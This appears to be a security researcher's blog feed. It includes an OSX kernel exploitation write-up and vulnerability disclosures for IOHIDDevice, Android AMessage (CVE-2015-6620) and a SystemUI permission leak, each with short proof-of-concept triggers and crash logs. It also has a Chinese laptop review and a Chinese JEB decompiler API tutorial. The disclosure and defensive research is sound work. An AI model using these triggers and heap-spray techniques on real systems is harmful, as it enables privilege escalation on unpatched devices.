Given the service + 0x1288 is controlled by us, this is a perfect way to return value at arbitrary address. Although only one byte is returned, it’s not a big deal because we can free and refill the ool_msgs as many times as we wish and read one byte by one. We now come up with these steps. – By spraying we can ensure 0xf… 62388000(A) lies an IGAccelVideoContext. And 0xf… bf800000(B) lies an vm_map_copy with size 0x2000 – Overwrite the service pointer to B, point to controlled vm_map_copy filled with 0x4141414141414141 (except at 0x1288 set to A – 0xD0) – Test for 0x41414141 by calling get_hw_steppings on sprayed userclients – If match, we get the index of userclient being corrupted. a24 returns a byte at A! You will be more clear with this figure:

infoleak-0

Head or middle, again

Smart reader will again noticed that we are currently assuming A falls at beginning of a IGAccelVideoContext. Also, nobody guarantees B falls right at the beginning the 0x2000 size vm_map_copy. It’s also a 50-50 chance.

For the latter, we take the same approach. When we are preparing ool_msg, we change 0x1288 and 0x288 both to A – 0xD0. For the former problem it’s a bit more complicated.

We have an observation that at the 0x1000 offset of a normal IGAccelVideoContext, the value are zero. This gives us a way to distinguish the two situations, given that now we can read out the content at address A. We can use an additional read to determine if the address is at A or A+0x1000. If we try A but its actually at A+0x1000, we will read byte at +0x1000 of IGAccelVideoContext, which is 0, then we can try again with A+0x1000 to read the correct value.

read-middle

These two figures may give you a more clearly concept on this trial-and-error approach.

read-1 read-2

Wrap it up

Leak arbitrary address, leak vtable pointer, prepare your gadgets, ahh. I’m a bit tired hmm, so if you are curious about what the blitzard vulnerability itself actually is, don’t miss our talk at Mandalay Bay GH at August 3 11:30, Blackhat USA. Wish to see you there 🙂

Also, it’s a pity the vulnerability is not selected for pwnie nominations, we will come up with a better one next year 🙂

Video is available at https://www.youtube.com/watch?v=1bnSDgzZDc0 and http://v.qq.com/x/page/f0196p3g7vq.html. Some spraying time is omitted. The article is also posted on http://keenlab.tencent.com/en/2016/07/29/The-Journey-of-a-complete-OSX-privilege-escalation-with-a-single-vulnerability-Part-1/.

Integer overflow due to compile behavior in OSX Kernel IOUSBHIDDevice

Interesting Integer overflow in enum comparison IOHIDDevice::handleReportWithTime

By flanker from KeenLab.

There exists a signed integer comparison overflow in IOHIDDevice::_getReport and then handleReportWithTime, which can lead to oob access/execute in handleReportWithTime. A normal process can leverage this vulnerability to archive potential code execution in kernel and escalate privilege.

Vulnerability analysis

When IOHIDLibUserClient::_getReport is called via externalMethod, the code execution flow will be redirected in IOHIDDevice::getReport and then called into IOHIDDevice::handleReportWithTime,

1281IOReturn IOHIDLibUserClient::getReport(IOMemoryDescriptor * mem, uint32_t * pOutsize, IOHIDReportType reportType, uint32_t reportID, uint32_t timeout, IOHIDCompletion * completion)
1282{
1283    IOReturn ret = kIOReturnBadArgument;
1284
1285    // VTN3: Is there a real maximum report size? It looks like the current limit is around
1286    // 1024 bytes, but that will (or has) changed. 65536 is above every upper limit
1287    // I have seen by a few factors.
1288    if (*pOutsize > 0x10000) {
1289        IOLog("IOHIDLibUserClient::getReport called with an irrationally large output size: %lu\n", (long unsigned) *pOutsize);
1290    }
1291    else if (fNub && !isInactive()) {
1292        ret = mem->prepare();
1293        if(ret == kIOReturnSuccess) {
1294            if (completion) {
1295                AsyncParam * pb = (AsyncParam *)completion->parameter;
1296                pb->fMax        = *pOutsize;
1297                pb->fMem        = mem;
1298                pb->reportType  = reportType;
1299
1300                mem->retain();
1301
1302                ret = fNub->getReport(mem, reportType, reportID, timeout, completion);
1303            }
1304            else {
1305                ret = fNub->getReport(mem, reportType, reportID);
1306
1307                // make sure the element values are updated.
1308                if (ret == kIOReturnSuccess)
1309                    fNub->handleReport(mem, reportType, kIOHIDReportOptionNotInterrupt);
1310
1311                *pOutsize = mem

Then handleReport and handleReportWithTime will be called.

2174IOReturn IOHIDDevice::handleReportWithTime(
2175    AbsoluteTime         timeStamp,
2176    IOMemoryDescriptor * report,
2177    IOHIDReportType      reportType,
2178    IOOptionBits         options)
2179{
2180    IOBufferMemoryDescriptor *  bufferDescriptor    = NULL;
2181    void *                      reportData          = NULL;
2182    IOByteCount                 reportLength        = 0;
2183    IOReturn                    ret                 = kIOReturnNotReady;
2184    bool                        changed             = false;
2185    bool                        shouldTickle        = false;
2186    UInt8                       reportID            = 0;
2187
2188    IOHID_DEBUG(kIOHIDDebugCode_HandleReport, reportType, options, __OSAbsoluteTime(timeStamp), getRegistryEntryID());
2189
2190    if ((reportType == kIOHIDReportTypeInput) && !_readyForInputReports)
2191        return kIOReturnOffline;
2192
2193    // Get a pointer to the data in the descriptor.
2194    if ( !report )
2195        return kIOReturnBadArgument;
2196
2197    if ( reportType >= kIOHIDReportTypeCount )
2198        return kIOReturnBadArgument;
2199
2200    reportLength = report->getLength();
2201    if ( !reportLength )
2202        return kIOReturnBadArgument;
2203
2204    if ( (bufferDescriptor = OSDynamicCast(IOBufferMemoryDescriptor, report)) ) {
2205        reportData = bufferDescriptor->getBytesNoCopy();
2206        if ( !reportData )
2207            return kIOReturnNoMemory;
2208    } else {
2209        reportData = IOMalloc(reportLength);
2210        if ( !reportData )
2211            return kIOReturnNoMemory;
2212
2213        report->readBytes( 0, reportData, reportLength );
2214    }

In Line 2197, there is an integer signed comparison overflow. The compiler decides the kIOHIDReportTypeCount, which is an enum value, is signed and the assembly instruction are as follows:

__text:0000000000006951                 mov     r13d, 0E00002C2h
__text:0000000000006957                 jz      loc_6BBE
__text:000000000000695D                 cmp     r15d, 2
__text:0000000000006961                 jg      loc_6BBE

we can see jg is used, which indicates a signed comparison.

The reportType is a int32 value determined by incoming externalMethod scalar:

in function setReport
1355    else
1356        if ( arguments->structureInputDescriptor )
1357            ret = target->setReport( arguments->structureInputDescriptor, (IOHIDReportType)arguments->scalarInput[0], (uint32_t)arguments->scalarInput[1]);
1358        else
1359            ret = target->setReport(arguments->structureInput, arguments->structureInputSize, (IOHIDReportType)arguments->scalarInput[0], (uint32_t)arguments->scalarInput[1]);
1360
1361    return ret;
1362}

So an attacker can supply an overflowed negative value, i.e. 0x80000000 in scalar input and cause oob access in handleReportWithTime:

2220
2221        // The first byte in the report, may be the report ID.
2222        // XXX - Do we need to advance the start of the report data?
2223
2224        reportID = ( _reportCount > 1 ) ? *((UInt8 *) reportData) : 0;
2225
2226        // Get the first element in the report handler chain.
2227
2228        element = GetHeadElement( GetReportHandlerSlot(reportID),
2229                                  reportType);

We can see reportType is used in GetHeadElement, and

260#define GetHeadElement(slot, type)  _reportHandlers[slot].head[type]

Type is used as index to head array, so we can control the element pointer and then a virtual call follows:

2060        while ( element ) {
2061
2062            element->createReport(reportID, reportData, &reportLength, &element);
2063

177    virtual bool createReport( UInt8           reportID,
178                               void *        reportData, // report should be allocated outside this method
179                               UInt32 *        reportLength,
180                               IOHIDElementPrivate ** next );

Thus it’s possible for code execution if memory is prepared.

CrashLog

We can see a page fault is generated on oob access, indicating the negative 32bit integer has been used as index when accessing memory.

panic(cpu 1 caller 0xffffff800af85b8f): "vm_page_check_pageable_safe: trying to add page" "from compressor object (0xffffff800b6c35f0) to pageable queue"@/Library/Caches/com.apple.xbs/Sources/xnu/xnu-3248.40.184/osfmk/vm/vm_resident.c:7076
Backtrace (CPU 1), Frame : Return Address
0xffffff911638b230 : 0xffffff800aedab12 mach_kernel : _panic + 0xe2
0xffffff911638b2b0 : 0xffffff800af85b8f mach_kernel : _vm_page_check_pageable_safe + 0x3f
0xffffff911638b2d0 : 0xffffff800af4a8e3 mach_kernel : _vm_fault_enter + 0x9b3
0xffffff911638b450 : 0xffffff800af4e80b mach_kernel : _vm_page_validate_cs_mapped_chunk + 0x226b
0xffffff911638b670 : 0xffffff800afcdf6d mach_kernel : _kernel_trap + 0x47d
0xffffff911638b850 : 0xffffff800afec273 mach_kernel : _return_from_trap + 0xe3
0xffffff911638b870 : 0xffffff7f8bd4c283 com.apple.iokit.IOHIDFamily : __ZN11IOHIDDevice20handleReportWithTimeEyP18IOMemoryDescriptor15IOHIDReportTypej + 0x191
0xffffff911638b9f0 : 0xffffff7f8bd4ad45 com.apple.iokit.IOHIDFamily : __ZN11IOHIDDevice12handleReportEP18IOMemoryDescriptor15IOHIDReportTypej + 0x5b
0xffffff911638ba30 : 0xffffff7f8bd486b2 com.apple.iokit.IOHIDFamily : __ZN18IOHIDLibUserClient9getReportEP18IOMemoryDescriptorPj15IOHIDReportTypejjP15IOHIDCompletion + 0x12c
0xffffff911638ba80 : 0xffffff7f8bd4877b com.apple.iokit.IOHIDFamily : __ZN18IOHIDLibUserClient9getReportEPvPj15IOHIDReportTypejjP15IOHIDCompletion + 0x99
0xffffff911638bad0 : 0xffffff7f8bd46c3b com.apple.iokit.IOHIDFamily : __ZN18IOHIDLibUserClient10_getReportEPS_PvP25IOExternalMethodArguments + 0x13b
0xffffff911638bb30 : 0xffffff800b4b5958 mach_kernel : __ZN13IOCommandGate9runActionEPFiP8OSObjectPvS2_S2_S2_ES2_S2_S2_S2_ + 0x1a8
0xffffff911638bba0 : 0xffffff7f8bd47556 com.apple.iokit.IOHIDFamily : __ZN18IOHIDLibUserClient14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x64
0xffffff911638bbe0 : 0xffffff800b4df277 mach_kernel : _is_io_connect_method + 0x1e7
0xffffff911638bd20 : 0xffffff800af97cc0 mach_kernel : _iokit_server + 0x5bd0
0xffffff911638be30 : 0xffffff800aedf283 mach_kernel : _ipc_kobject_server + 0x103
0xffffff911638be60 : 0xffffff800aec28b8 mach_kernel : _ipc_kmsg_send + 0xb8
0xffffff911638bea0 : 0xffffff800aed2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5
0xffffff911638bf10 : 0xffffff800afb8bda mach_kernel : _mach_call_munger64 + 0x19a
0xffffff911638bfb0 : 0xffffff800afeca96 mach_kernel : _hndl_mach_scall64 + 0x16
      Kernel Extensions in backtrace:
         com.apple.iokit.IOHIDFamily(2.0)[8D04EA14-CDE1-3B41-8571-153FF3F3F63B]@0xffffff7f8bd46000->0xffffff7f8bdbdfff
            dependency: com.apple.driver.AppleFDEKeyStore(28.30)[C31A19C9-8174-3E35-B2CD-3B1B237C0220]@0xffffff7f8bd3b000

BSD process name corresponding to current thread: Python

POC

KitLib Python Code:

import kitlib
h = kitlib.openMultipleSvc('IOUSBHostHIDDevice', [0,0])[1]
kitlib.callConnectMethod(h, 12, [0x80000000L]*3, '', 0, 1)

Tested on macmini/macbooks with usb keyboard connected (for this specific IOUSBHIDDevice service). Of course other services extending IOHIDDevice can also be affected. Other models can also apply with configuration parameter tunned.
Changing the first parameter to like 0x8000ffff and we can observe that the fault address has changed correspondingly, showing the possibility of exploitation.

Fix advice

add check on reportType for negative, only accept positive value. Fixed in 10.11.5 by replacing jg with ja.

Full POC at https://github.com/flankerhqd/IOUSBHID-IOHID-Overflow

Surface Pro 入手体验

(Update: 我们pwn2own奖品已经拿到了,zdi发了一台surface pro4高配版,所以下面就不用看了233)

为什么要买Surface

先介绍下我现在的工作环境: 主力办公机是一台公司去年配的台式,32G内存+i7 4770K+128G SSD和2T SATA,配了27+24的两个显示器,安装Ubuntu Linux 14.04和VMware里的Win10. 主要的高性能需求工作(编译源代码,批量处理等)都在这个上面进行。然后有一些服务器来搞fuzz。此外还有一个12年底个人买的15寸RMBP,已经服役3年之久。

这个组合从工作性能上还是一个非常强劲的组合,工作机自不待说,而MBP除了8G内存在虚拟机开多的情况下稍显不足之外,并没有显露疲态。而我的工作因为和Android/Linux有关,在这些*nix平台上也进行的得心应手。我平常玩游戏并不多,玩的也比较老,主要是红警3,所以RMBP的显卡也足够应付,并没有购置高性能显卡台式的需求。

但是这个组合最明显的问题是太重量级了。台式机自然不能扛着到处跑,而12年底的15寸RMBP也略显沉重,三年时间对电池的摧残也无法直视。iPad不堪大用,只能用来看看PDF。随着时间的推移和工作内容的变化,我发觉这个问题越来越显著,于是心里开始长草,准备购进一个轻量级的工作装备。而备选者并不多:New Macbook, Macbook Air, Surface和Surface Book

Surface vs Macbook

在四个候选的list里,New Macbook最先被排除了,因为在实体店试用的时候,键盘给我留下了很恶劣的印象,就首先被pass。而潜意识中我觉得两台Macbook比较重合,需要一台Windows本来增加装备多样性,承担一些Windows上的轻量级工作。Macbook Air屏幕太差,也不予考虑。

那么下面就是选择哪款Surface的问题。由于我已经有主力移动和台式工作装备,给Surface的定位是移动轻量级,那么i7的配置就不进行考虑。Surface虽然是Macbook+iPad的竞争对手,但是老实来讲在中高端价格方面(i5配置的Surface以上,6k-8k),对于Linux重度工作相关用户Macbook Pro对于*nix用户相对Surface有太大优势。而在更高价格上(8000-12000),同理Surface Book这个新生儿相对于15寸Macbook Pro也没有太大优势。我个人的消费理念是不怕贵,不差这点钱,但希望物有所值,用比较多的溢价买用不到的功能是一种很亏的行为。

恰好狗东在前几天搞促销,Surface Pro 3 i3+128G存储+4G价格4688,对比了下Surface Pro4 和 Pro3感觉变化并不大,价格却多了1k。于是用了一些券和TSRC送的京东卡后4088拿下。又在TB和JD上花了总计900余元购置了Type Cover和触控笔。

使用体验

总体来讲这还是笔很令人满意的投资,用比13寸Macbook Air(6288)少1k多的价格获得了相对优秀性能和Macbook Pro的视觉感受,Air的便携性。首先Surface Pro3的屏幕还是很令人惊艳的,与Pro不分伯仲。而在i3 Surface上进行源代码审计、文字编写和远程桌面也绰绰有余。高性能工作ssh或rdp远程到台式或者服务器即可。续航相对Air差一些,但也还可以接受。

TypeCover键程相对有点短,不如MBP,但比Air好,当然不能跟Cherry机械键盘比,也处于可以忍受的范围;Type Cover触摸板完全能够替代鼠标。触控笔比较鸡肋,但看PDF的时候也能用得到。

总结

总之这是我这次选购轻量级工作装备的经验,希望能给有相似工作性质的朋友一些参考。

ANDROIDID-24123723 (CVE-2015-6620) POC and writeup

github link at https://github.com/flankerhqd/CVE-2015-6620-POC

CVE-2015-6620-POC-1

POC for one bug in CVE-2015-6620-1 (ANDROIDID-24123723), AMessage unmarshal arbitrary write. The two bugs are merged to one CVE, and here is POC for one of them.

Explaination

533 sp<AMessage> AMessage::FromParcel(const Parcel &parcel) {
534    int32_t what = parcel.readInt32();
535    sp<AMessage> msg = new AMessage(what);
536
537    msg->mNumItems = static_cast<size_t>(parcel.readInt32()); //mNumItems can be set by attacker
538    for (size_t i = 0; i < msg->mNumItems; ++i) {
539        Item *item = &msg->mItems[i];
540
541        const char *name = parcel.readCString();
542        item->setName(name, strlen(name));
543        item->mType = static_cast<Type>(parcel.readInt32());
544
545        switch (item->mType) {
547            {
548                item->u.int32Value = parcel.readInt32();//overwrite out-of-bound
549                break;
550            }

65 void AMessage::clear() {
66    for (size_t i = 0; i < mNumItems; ++i) {
67        Item *item = &mItems[i];
68        delete[] item->mName; //maybe freeing the wrong pointer if i ran out-of-bound
69        item->mName = NULL;
70        freeItemValue(item);
71    }
72    mNumItems = 0;
73}

The msg->mItems is an array of fixed size kMaxNumItems=64, however when AMessage is unmarshalled, the loop counter can be set far beyond this limit, thus lead to memory overwrite or arbitrary freeing, then memory corruption.

Then we need to find a binder interface that will unmarshal the AMessage and can be called by unprivileged application. Through searching I found that the IStreamListener->issueCommand is a callback that accepts transaction from normal client, then processed at the mediaserver side. And it will construct AMessage from input parcel.

To get an IStreamListener, one way is create a BnStreamSource and provide to MediaPlayer->setDataSource, then when playing MediaPlayer will call the setListener method of your BnStreamSource Implementation, providing the client an IStreamListener and communicate control params via AMessage. So, we provide our fake AMessage here. Boom!

Test method:

Build the POC with name stream, then ran with adb shell stream ts-file-name. I use a TS media file to trigger the binder callback for simplicity, but there should be better options.

Sample crash:

F/libc    (17405): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xdfe85000 in tid 17511 (streaming)
I/DEBUG   (  355): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   (  355): Build fingerprint: 'google/shamu/shamu:5.1.1/LMY48I/2074855:user/release-keys'
I/DEBUG   (  355): Revision: '33696'
I/DEBUG   (  355): ABI: 'arm'
W/NativeCrashListener(  839): Couldn't find ProcessRecord for pid 17405
I/DEBUG   (  355): pid: 17405, tid: 17511, name: streaming  >>> /system/bin/mediaserver <<<
E/DEBUG   (  355): AM write failure (32 / Broken pipe)
I/DEBUG   (  355): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xdfe85000
I/DEBUG   (  355):     r0 29685000  r1 d6d5d4d9  r2 b6802e74  r3 fff29685
I/DEBUG   (  355):     r4 b6800000  r5 000003df  r6 b6802e8c  r7 c81fff19
I/DEBUG   (  355):     r8 b6be24b8  r9 000003e2  sl b380bbac  fp b6e65fd8
I/DEBUG   (  355):     ip 0000000c  sp b380bac0  lr b6e31b3d  pc b6e31af6  cpsr 200f0030
I/DEBUG   (  355): 
I/DEBUG   (  355): backtrace:
I/DEBUG   (  355):     #00 pc 00041af6  /system/lib/libc.so (je_arena_dalloc_bin+41)
I/DEBUG   (  355):     #01 pc 00041b39  /system/lib/libc.so (je_arena_dalloc_small+28)
I/DEBUG   (  355):     #02 pc 000498b3  /system/lib/libc.so (ifree+462)
I/DEBUG   (  355):     #03 pc 00012caf  /system/lib/libc.so (free+10)
I/DEBUG   (  355):     #04 pc 0000c943  /system/lib/libstagefright_foundation.so (android::AMessage::clear()+24)
I/DEBUG   (  355):     #05 pc 0000c973  /system/lib/libstagefright_foundation.so (android::AMessage::~AMessage()+18)
I/DEBUG   (  355):     #06 pc 0000c98d  /system/lib/libstagefright_foundation.so (android::AMessage::~AMessage()+4)
I/DEBUG   (  355):     #07 pc 0000ec55  /system/lib/libutils.so (android::RefBase::decStrong(void const*) const+40)
I/DEBUG   (  355):     #08 pc 0003a679  /system/lib/libmediaplayerservice.so (android::sp<android::SharedLibrary>::~sp()+10)
I/DEBUG   (  355):     #09 pc 0005bbeb  /system/lib/libmediaplayerservice.so
I/DEBUG   (  355):     #10 pc 0005be71  /system/lib/libmediaplayerservice.so (android::NuPlayer::NuPlayerStreamListener::read(void*, unsigned int, android::sp<android::AMessage>*)+216)
I/DEBUG   (  355):     #11 pc 000580fb  /system/lib/libmediaplayerservice.so (android::NuPlayer::StreamingSource::onReadBuffer()+50)
I/DEBUG   (  355):     #12 pc 00058271  /system/lib/libmediaplayerservice.so (android::NuPlayer::StreamingSource::onMessageReceived(android::sp<android::AMessage> const&)+20)
I/DEBUG   (  355):     #13 pc 0000c4c3  /system/lib/libstagefright_foundation.so (android::ALooperRoster::deliverMessage(android::sp<android::AMessage> const&)+166)
I/DEBUG   (  355):     #14 pc 0000be45  /system/lib/libstagefright_foundation.so (android::ALooper::loop()+220)
I/DEBUG   (  355):     #15 pc 000104d5  /system/lib/libutils.so (android::Thread::_threadLoop(void*)+112)
I/DEBUG   (  355):     #16 pc 00010045  /system/lib/libutils.so
I/DEBUG   (  355):     #17 pc 00016baf  /system/lib/libc.so (__pthread_start(void*)+30)
I/DEBUG   (  355):     #18 pc 00014af3  /system/lib/libc.so (__start_thread+6)
I/DEBUG   (  355): 
I/DEBUG   (  355): Tombstone written to: /data/tombstones/tombstone_04

Series of vulnerabilities in system_server and mediaserver

CVE-2015-3854 ANDROID-20918350
CVE-2015-3855 ANDROID-20917238
CVE-2015-3856 ANDROID-20917373

Since those are posted prior to Android Security Bug Bounty Program launch, I’m posting to fulldisclosure for the record.

cveold

Details

A permission leakage exists in Android 5.x that enables a malicious application to acquire the system-level protected permission of DEVICE_POWER.

There exists a permission leakage in packages/SystemUI/src/com/android/systemui/power/PowerNotificationWarnings.java, An attacker app without any permission can turn off battery save mode (which should be guarded by DEVICE_POWER permission, which is a system permission, lead to permission leakage), dismiss low battery notification.

Analysis

The PowerNotificationWarnings registered a dynamic receiver without permission guard, listening for the following actions:

  • PNW.batterySettings
  • PNW.startSaver
  • PNW.stopSaver
  • PNW.dismissedWarning

The PNW.stopSaver will call setSaverMode(false), thus call mPowerMan.setPowerSaveMode(false), which finally calls PowerManager.setPowerSaveMode(false).

“`java (code of PowerNotificationWarnings.java) private final class Receiver extends BroadcastReceiver {

    public void init() {
        IntentFilter filter = new IntentFilter();
        filter.addAction(ACTION_SHOW_BATTERY_SETTINGS);
        filter.addAction(ACTION_START_SAVER);
        filter.addAction(ACTION_STOP_SAVER);
        filter.addAction(ACTION_DISMISSED_WARNING);
        mContext.registerReceiverAsUser(this, UserHandle.ALL, filter, null, mHandler);
    }

@Override public void onReceive(Context context, Intent intent) { final String action = intent.getAction(); Slog.i(TAG, “Received ” + action); if (action.equals(ACTION_SHOW_BATTERY_SETTINGS)) { dismissLowBatteryNotification(); mContext.startActivityAsUser(mOpenBatterySettings, UserHandle.CURRENT); } else if (action.equals(ACTION_START_SAVER)) { dismissLowBatteryNotification(); showStartSaverConfirmation(); } else if (action.equals(ACTION_STOP_SAVER)) { dismissSaverNotification(); dismissLowBatteryNotification(); setSaverMode(false);//PERMISSION LEAK HERE! } else if (action.equals(ACTION_DISMISSED_WARNING)) { dismissLowBatteryWarning(); } } “`

An ordinary app cannot directly call this method because this API call is guarded by system permission DEVICE_POWER, however by sending a broadcast with action “PNW.stopSaver”, it can trigger this API call on behave of SystemUI, thus stops battery saver without user action and awareness.

Tested on Nexus 6/Nexus 7 (5.1.1)

POC code(do not require any permission)

    Intent intent = new Intent();
    intent.setAction("PNW.stopSaver");
    sendBroadcast(intent);

Possible mitigations

Use a local broadcast mechanism, or use permission to guide the dynamic receiver.

Official fixes:

fixed in https://android.googlesource.com/platform/frameworks/base/+/05e0705177d2078fa9f940ce6df723312cfab976

Report timeline

2015.5.6 Initial report to security@android.com 2015.5.8 Android Security Team acks and assigned ANDROID-20918350 2015.6.1 The bug is fixed in Android internal branch 2015.7.24 CVE Requested, assigned CVE-2015-3854 2016.5.26 Public Disclosure

Advanced Android Application Analysis Series – JEB API Manual and Plugin Writing

Android应用分析进阶教程之一- 初识JEBAPI

还在对着smali和jdgui抓耳挠腮grep来grep去吗?本系列教程将围绕Soot和JEB,讲述Android应用的进阶分析,感受鸟枪换炮的快感.

JEB是Android应用静态分析的de facto standard,除去准确的反编译结果、高容错性之外,JEB提供的API也方便了我们编写插件对源文件进行处理,实施反混淆甚至一些更高级的应用分析来方便后续的人工分析.本系列文章的前几篇将对JEB的API使用进行介绍,并实战如何利用开发者留下的蛛丝马迹去反混淆.先来看看我们最终编写的这个自动化反混淆插件实例的效果:

反混淆前: before-deobfus-1 before-deobfus-2 反混淆后: after-deobfus-1

after-deobfus-2 可以看到很多类名和field名都被恢复出来了. 读者朋友肯定会好奇这是如何做到的, 那我们首先来看下JEB提供API的结构:

JEB AST API结构

JEB的AST与Java的AST稍有不同,但大体还是很相似的,只是做了些简化.所有的AST Element实现jeb.api.ast.IElement,要么继承于jeb.api.ast.NonStatement,要么继承于jeb.api.ast.Statement.他们的关系如下图所示: ast-1

IElement定义了getSubElements,但不同类型的实现和返回结果也不同,例如对Method进行getSubElements调用的返回会是函数的参数定义语句和函数体block,而IfStmt会返回判断使用的Predicate和每一个if/else/ifelse语句块.而一个Assignment语句则会返回左右IExpression操作数,以及Operator操作符.具体编写脚本中我们通常并不使用这个函数,而根据具体类型定义的更细致的函数,例如Assignment提供的getLeftgetRight.

以下面的函数为例,我们来分析它具体由哪些AST元素组成.

boolean isZtz162(Ztz ztz) 
{ 
boolean bool = true; 
Redrain redrain = Redrain.getInstance("AnAn");                 if(redrain.canShoot()) 
{ 
redrain.shoot(163); 
if(ztz.isDead()) { bool = false; } 
}
 else if(ztz.height + Integer.parseInt(ztz.shoe) > 162)
 { bool = false; }
 return bool;
}

首先来看下NonStatement

NonStatement

在文档中, NonStatement的描述是Base class for AST elements that do not represent Statements. ,即所有不是Statement的AST结构继承于NonStatement,如下图所示: ast-2

NonStatementExpression的区别在于,NonStatement包含了一些高阶结构,例如jeb.api.ast.Class, jeb.api.ast.Method这些并不会出现在语句中的AST结构体,他们分别代表一个Class结构和Method结构,注意不要与反射语句中使用的Class和Method混淆.

Statement

Statement顾名思义就代表了一个语句,但值得注意的是这里的语句并不代表单个语句,继承于CompoundStatement中也可能包含其他的Statement.例如下面这段代码:

if(ztz.isDead())//redundant statement to demonstrate if-else { return false; }
else{ return true; }

这事实上是一整个继承于CompoundIfStm,也就是Statement.

Statement的继承关系图如下图所示, ast-3

CompoundStatement是最基本的语句结构,它的子节点只会由Expression构成而不会包含block. 例如Assignment,可以通过getLeftgetRight调用获得左右两边的操作对象,分别为ILeftExpressionIExpression.ILeftExpression代表可以做左值的Expression,例如变量.而常量显然不实现ILeftExpression接口

Compound

Compound代表多个语句集合的语法块集合,每一个语法块以Block(也是Compound的子类)呈现,通过getBlocks调用获得.所有分支语句均继承Compound,如下图所示: ast-4

在上面提到的例子中,IfStmt就是一个Compound,我们通过getBranchPredicate(idx)获取Predict,也就是ztz.isDead()这个Expression,而这个Expression真正的类型是子类Call.我们可以通过getBranchBody(idx)获取if和if-else中的Block,通过getDefaultBlock获取else的Block

IExpression

IExpression代表了最基本的AST节点,其实现关系如下图: ast-5

IExpression接口的实现者Expression类代表了算术和逻辑运算的语句片段,例如a+b, “162” + ztz.toString(), !ztz, redrain*(ztz-162)等等,同时Predicate类是Expression类的直接子类,譬如在if(ztz162)中,该语句的Predicate左值为ztz162这个identifier,右值为null.

ztz.test(1) + ”height" + 162这个Expression为例,其结构组成和各节点类型如下: jeb-expression-chart 值得注意的有如下几点: – Expression是从右到左的结构 – Call没有提供获取caller的API,不过可以通过getSubElements()获取,返回顺序为 – callee method – calling instance (if instance call) – calling arguments, one by one

InstanceField, StaticField和Field

三者的关系如下图所示: 1434640610408

InstanceFieldStaticField包含Field. InstanceField通过getInstance调用获取一个IExpression,也就是Field的container. Field本身是Class的元素,而InstanceFieldStaticField则是它的具体实例化.

实例Method分析

以我们上面提到的isZtz162函数为例,它的AST结构如下:

  • jeb.api.ast.Method (getName() == “isZtz162”) => getBody()
    • Block => block.get(i) //遍历block中的语句
      • Assignment “boolean bool = true” => getSubElements
        • Definition “boolean bool”
          • Identifier “bool”
        • Constant “true”
      • Assignment “Redrain redrain = Redrain.getInstance(“AnAn”);” => getSubElements
        • Definition => getSubElements (注意它是父assignment的getLeft返回结果(左值))
          • Identifier “redrain”
        • Call “Redrain.getInstance(“AnAn)”” (注意它是父assignment的getRight返回结果(右值))
          • …(omit)
      • IfStmt (Compound) => getBlocks()
        • Block (if block) => block.get(i) 遍历block中的语句
          • Call “redrain.shoot(163);”
          • IfStmt (Compound)
            • …omit
        • Block (elseif block) => block.get(i) 遍历block中的语句
          • Assignment “bool = false'”
          • ..omit

可以通过如下代码来递归打印一个Method中的各个Element: class test(IScript):

def run(self, j):
    self.instance = j
    sig = self.instance.getUI().getView(View.Type.JAVA).getCodePosition().getSignature()
    currentMethod = self.instance.getDecompiledMethodTree(sig)
    self.instance.print("scanning method: " + currentMethod.getSignature())

    body = currentMethod.getBody()
    self.instance.print(repr(body))
    for i in range(body.size()):
        self.viewElement(body.get(i),1)

def viewElement(self, element, depth):
    self.instance.print("    "*depth+repr(element))
    for sub in element.getSubElements():
        self.viewElement(sub, depth+1)

输出结果如下:

jeb.api.ast.Block@5909b311
    jeb.api.ast.Assignment@bcb4ec2
    jeb.api.ast.Definition@66afd874
        jeb.api.ast.Identifier@38ffa6bd
    jeb.api.ast.Constant@181bdf87
    jeb.api.ast.Assignment@4df0246e
    jeb.api.ast.Definition@50e7d9bb
        jeb.api.ast.Identifier@2587ad7c
    jeb.api.ast.Call@6e8ebb23
        jeb.api.ast.Method@5ca02f89
            jeb.api.ast.Definition@1890fae1
                jeb.api.ast.Identifier@5646d660
            jeb.api.ast.Block@44a464e0
        jeb.api.ast.Constant@4dad155
    jeb.api.ast.IfStm@298ea172
    jeb.api.ast.Predicate@530958ae
        jeb.api.ast.Call@a9d3219
            jeb.api.ast.Method@56440cc0
                jeb.api.ast.Definition@da13d7f
                    jeb.api.ast.Identifier@54cc63d6
                jeb.api.ast.Block@36aea218
            jeb.api.ast.Identifier@2587ad7c
    jeb.api.ast.Predicate@313f1b4
        jeb.api.ast.Expression@12616200
            jeb.api.ast.InstanceField@3768f76d
                jeb.api.ast.Identifier@4c4c3186
                jeb.api.ast.Field@198ed96b
            jeb.api.ast.Call@71640ce8
                jeb.api.ast.Method@5f8b8d80
                jeb.api.ast.InstanceField@42f6ff81
                    jeb.api.ast.Identifier@4c4c3186
                    jeb.api.ast.Field@6600907f
        jeb.api.ast.Constant@2f0eb62a
    jeb.api.ast.Block@6ed99788
        jeb.api.ast.Call@f6b9a93
            jeb.api.ast.Method@617130cd
                jeb.api.ast.Definition@4e3b14b5
                    jeb.api.ast.Identifier@8cc9f33
                jeb.api.ast.Definition@31e7d1c8
                    jeb.api.ast.Identifier@6a7dbb10
                jeb.api.ast.Block@64844e0e
            jeb.api.ast.Identifier@2587ad7c
            jeb.api.ast.Constant@2a20acb0
        jeb.api.ast.IfStm@47296c6b
            jeb.api.ast.Predicate@708d094c
                jeb.api.ast.Call@3b5d964e
                    jeb.api.ast.Method@7d36f954
                        jeb.api.ast.Definition@242b3a05
                            jeb.api.ast.Identifier@11ee30d0
                        jeb.api.ast.Block@2cc6b0e2
                    jeb.api.ast.Identifier@4c4c3186
            jeb.api.ast.Block@2886dc65
                jeb.api.ast.Assignment@2def7fac
                    jeb.api.ast.Identifier@38ffa6bd
                    jeb.api.ast.Constant@46a70cc3
    jeb.api.ast.Block@136fa72
        jeb.api.ast.Assignment@407452fd
            jeb.api.ast.Identifier@38ffa6bd
            jeb.api.ast.Constant@46a70cc3
    jeb.api.ast.Return@14f4811a
    jeb.api.ast.Identifier@38ffa6bd

对AST结构的分析就到这里,本文选取了几种最典型的做了讲解.此外JEB还提供了jeb.api.dex,提供了对dex文件的操作API.由于这方面资料比较多,这里就先不赘述了.

实例分析之开发环境配置

